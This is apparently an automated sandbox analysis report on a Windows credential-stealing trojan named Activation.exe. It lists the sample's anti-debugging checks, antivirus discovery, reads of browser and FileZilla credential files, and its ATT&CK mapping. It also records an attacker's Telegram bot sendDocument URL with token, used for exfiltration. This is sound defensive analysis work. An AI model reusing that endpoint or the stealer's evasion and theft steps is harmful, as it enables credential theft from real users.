Source: C:\Users\user\Desktop\Activation.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\Activation.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\Activation.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Activation.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Activation.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\Activation.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\Activation.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Activation.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\Activation.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\Activation.exe | Process queried: DebugObjectHandle
Source: C:\Users\user\Desktop\Activation.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\Activation.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\Activation.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\Activation.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\Activation.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Activation.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Activation.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.5.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Activation.exe, 00000000.00000002.1645685696.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.5.dr | Binary or memory string: MsMpEng.exe
Source: C:\Users\user\Desktop\Activation.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

            Stealing of Sensitive Information

Source: Yara match | File source: 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1654044812.00000000034D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1655462296.00000000049FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1655462296.00000000048BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1655462296.00000000046DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1655462296.00000000044D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Activation.exe PID: 7588, type: MEMORYSTR
Source: Yara match | File source: 00000000.00000002.1654044812.0000000003607000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1654044812.00000000034D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1655462296.00000000049FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1654044812.000000000361E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1655462296.00000000048BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1654044812.000000000362C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1655462296.00000000046DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1655462296.00000000044D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Activation.exe PID: 7588, type: MEMORYSTR
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: C:\Users\user\Desktop\Activation.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Activation.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Activation.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Activation.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db
Source: C:\Users\user\Desktop\Activation.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\Activation.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Activation.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\Activation.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\Activation.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml

            Remote Access Functionality

Source: Yara match | File source: 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1654044812.00000000034D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1655462296.00000000049FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1655462296.00000000048BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1655462296.00000000046DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1655462296.00000000044D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Activation.exe PID: 7588, type: MEMORYSTR
Source: Yara match | File source: 00000000.00000002.1654044812.0000000003607000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1654044812.00000000034D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1655462296.00000000049FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1654044812.000000000361E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1655462296.00000000048BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1654044812.000000000362C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1655462296.00000000046DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1655462296.00000000044D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Activation.exe PID: 7588, type: MEMORYSTR
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Tactic | Techniques (counts as given in the report)
Reconnaissance | Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development | Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access | Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution | Windows Management Instrumentation (231); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence | DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation | Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion | Disable or Modify Tools (1); Virtualization/Sandbox Evasion (571); Process Injection (1); Obfuscated Files or Information (2); Software Packing (12); DLL Side-Loading (1)
Credential Access | OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery | Security Software Discovery (761); Process Discovery (1); Virtualization/Sandbox Evasion (571); Application Window Discovery (1); System Information Discovery (124); Wi-Fi Discovery
Lateral Movement | Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection | Archive Collected Data (1); Data from Local System (2); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control | Web Service (1); Encrypted Channel (11); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (14); Multiband Communication
Exfiltration | Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact | Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Source | Detection | Scanner | Label | Link
Activation.exe | 42% | ReversingLabs | |
Activation.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
Source | Detection | Scanner | Label | Link
http://get.geojs.iod | 0% | Avira URL Cloud | safe |
https://api.teleLR | 0% | Avira URL Cloud | safe |
https://get.geoj8 | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
get.geojs.io | 104.26.1.100 | true | false | | high
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot7772275304:AAF3OSvWBzn5cIHkGD9ueBFz5ed91u-60-U/sendDocument | false | | high
https://get.geojs.io/v1/ip/geo.json | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | Activation.exe, 00000000.00000002.1655462296.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1655462296.00000000046BB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://t.me/ | Activation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003471000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003514000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | Activation.exe, 00000000.00000002.1655462296.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1655462296.00000000046BB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://t.me/freakcodingspot | Activation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003471000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003514000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org | Activation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | Activation.exe, 00000000.00000002.1655462296.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1655462296.00000000046BB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot | Activation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://get.geojs.iod | Activation.exe, 00000000.00000002.1654044812.00000000035C4000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://t.me/TheDyer | Activation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003471000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.00000000034D2000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.000000000362C000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003514000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.000000000361E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | Activation.exe, 00000000.00000002.1655462296.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1655462296.00000000046BB000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://upx.sf.net | Amcache.hve.5.dr | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | Activation.exe, 00000000.00000002.1655462296.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1655462296.00000000046BB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | Activation.exe, 00000000.00000002.1655462296.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1655462296.00000000046BB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | Activation.exe, 00000000.00000002.1655462296.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1655462296.00000000046BB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.teleLR | Activation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://get.geojs.io | Activation.exe, 00000000.00000002.1654044812.00000000035C4000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot7772275304:AAF3OSvWBzn5cIHkGD9ueBFz5ed91u-60-U/sendDocumentd | Activation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | Activation.exe, 00000000.00000002.1655462296.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1655462296.00000000046BB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://get.geojs.io | Activation.exe, 00000000.00000002.1654044812.0000000003471000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003514000.00000004.00000800.00020000.00000000.sdmp | false |
                                                        high
                                                        http://api.telegram.orgdActivation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://get.geoj8Activation.exe, 00000000.00000002.1654044812.0000000003514000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://api.telegram.orgActivation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameActivation.exe, 00000000.00000002.1654044812.0000000003471000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Activation.exe, 00000000.00000002.1655462296.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1655462296.00000000046BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://t.me/webster480Activation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003471000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.00000000034D2000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.000000000362C000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003514000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.000000000361E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
104.26.1.100 | get.geojs.io | United States | 13335 | CLOUDFLARENETUS | false
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1568338
                                                                  Start date and time:2024-12-04 15:10:51 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 4m 56s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:10
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:Activation.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@2/5@2/2
                                                                  EGA Information:Failed
                                                                  HCA Information:
                                                                  • Successful, ratio: 68%
                                                                  • Number of executed functions: 143
                                                                  • Number of non-executed functions: 5
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 104.208.16.94
                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                                                                  • Execution Graph export aborted for target Activation.exe, PID 7588 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • VT rate limit hit for: Activation.exe
Time | Type | Description
09:11:58 | API Interceptor | 34x Sleep call for process: Activation.exe modified
09:12:11 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):65536
                                                                                      Entropy (8bit):1.3050798073506145
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:B4Gjrrm+hf0BU/HnAjAHtdTJZrWyUzuiFEZ24IO8hM:jO+KBU/gjaiyUzuiFEY4IO8a
                                                                                      MD5:6D044524EFB8CDC983873C14407CA531
                                                                                      SHA1:12D8FC0151730D32AC7537EED8F8A0B228748134
                                                                                      SHA-256:2CA54490251FCEFCF1EAAC1722A47F9F2EECC3E61CB83B5F829E278815BC212A
                                                                                      SHA-512:9514980B26F8233DFBF453AA2EAB17FF6953BA10FCB1D265D31CC6C97B2780D67EEFDC4F0D529F1076AB2799F75A55CBAF232263106745E520CA10926F33D358
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.7.9.5.1.2.2.3.2.7.7.6.9.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.7.9.5.1.2.3.8.7.4.6.4.8.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.a.f.6.4.5.6.3.-.8.c.1.9.-.4.b.9.d.-.b.6.e.b.-.e.a.6.b.a.e.0.d.b.5.d.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.9.e.1.1.2.4.a.-.1.a.9.8.-.4.3.4.9.-.8.9.c.b.-.f.0.a.c.d.f.b.3.5.4.c.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.A.c.t.i.v.a.t.i.o.n...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.q.b.i.t.t.o.r.r.e.n.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.a.4.-.0.0.0.1.-.0.0.1.4.-.4.d.2.6.-.d.f.7.1.5.6.4.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.2.2.b.f.c.a.6.f.a.2.b.5.2.d.5.2.1.f.6.1.a.f.e.0.8.a.c.e.8.c.7.0.0.0.0.0.9.0.4.!.0.0.0.0.b.a.e.c.5.2.5.e.2.5.7.8.6.a.3.7.8.7.b.9.0.b.3.0.0.a.3.8.3.f.8.1.4.
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:Mini DuMP crash report, 15 streams, Wed Dec 4 14:12:02 2024, 0x1205a4 type
                                                                                      Category:dropped
                                                                                      Size (bytes):372140
                                                                                      Entropy (8bit):3.4259766265083575
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:5mCWbknGY5yLys4H4uEqoSqhQbh12dLTgGZiEg1N:5GbqALy/H43U25TgGNq
                                                                                      MD5:D41C85C50955A6D2ED23CEDFC3145419
                                                                                      SHA1:A156638AEF5D2CCB6A17018FB5CDD05D498DE6C7
                                                                                      SHA-256:3BC82C62EB8F08DC70DAEE295C4D79CD5CEC1E7927A684AA6B6175210BD17151
                                                                                      SHA-512:2CFBA081A6D33641CF9B75E598FC2CC7C34222E9B899FA57196E9DA7B424CEC8A2DF4DFB77D7B592E8A17D3FC32130AA51558BDCF86EA3F62FCDC62AE167523F
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:MDMP..a..... .......2cPg.........................%..........<...h0.......-...y..........`.......8...........T...........`_..LN...........0...........2..............................................................................eJ......(3......GenuineIntel............T............cPg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):8418
                                                                                      Entropy (8bit):3.691742832374065
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:R6l7wVeJXt6D9Tbe6YcDNSU7XBGgmfZRpprp89b9rsfxzfm:R6lXJ96I6YKSU7wgmf/y9wfg
                                                                                      MD5:AB7434C43DF7B3490987D4FE9D50F529
                                                                                      SHA1:4BFD4E615248CE6AD7368A70EAD92EE8A8291D09
                                                                                      SHA-256:78EF32F957B094439ACF8AEFA1D22B324D9740A198539350AA5AB549D4B62D26
                                                                                      SHA-512:CF7AE35E26765D3477F4A599FDC24926D73850397A85805C2DF7D1E496ED8E2E322274D7CCB3B8BAC21B104F566439E2064467055C7C9149D70E5C5F981B0D19
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.8.8.<./.P.i.
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):4755
                                                                                      Entropy (8bit):4.45552039801645
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:cvIwWl8zsZOJg77aI9L/fQWpW8VYsYm8M4JM3Fc+q8vqXiKFq+d:uIjfKI7VB7V8JDKIiKFq+d
                                                                                      MD5:E98A4D0D4B24BDA2DC322AFFBD60EDCB
                                                                                      SHA1:B7D413646B38E2E02B3659F79CE885C292603A35
                                                                                      SHA-256:C342C35718E00945EE844F1AF06C2260E25C147BFCD2E1C98FF81770B77F1851
                                                                                      SHA-512:ED4A49F787A240BC69F1771B747D593067B60239628F1B11E5366527993D6369FA59A4F7B5E021B5F701361D22D2A6395EE2BF793D0058A8E07C34A25E784857
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="616634" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                      Category:dropped
                                                                                      Size (bytes):1835008
                                                                                      Entropy (8bit):4.394228956586081
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:fl4fiJoH0ncNXiUjt10q0G/gaocYGBoaUMMhA2NX4WABlBuN2ROBSqa:d4vF0MYQUMM6VFYgRU
                                                                                      MD5:46B577A39395722D5BFFEAA38E0FC189
                                                                                      SHA1:F9E5699AB892BBD75D0ECC71CE37E20DEA9035B3
                                                                                      SHA-256:E496CD4210B73BD36FC212B319CFEC1A2DC16456A3850E68F3A337D178C3EB5D
                                                                                      SHA-512:DAE1F6A56778B6CEDAE654EED4B1715269DC7B7B5BDEAE2E501810373AD42470E722B85B1A1DD8638E79AB0F3063926CDAE549EBF40C98BBBA558786499FDD69
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..Y}VF..............................................................................................................................................................................................................................................................................................................................................>.NI........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
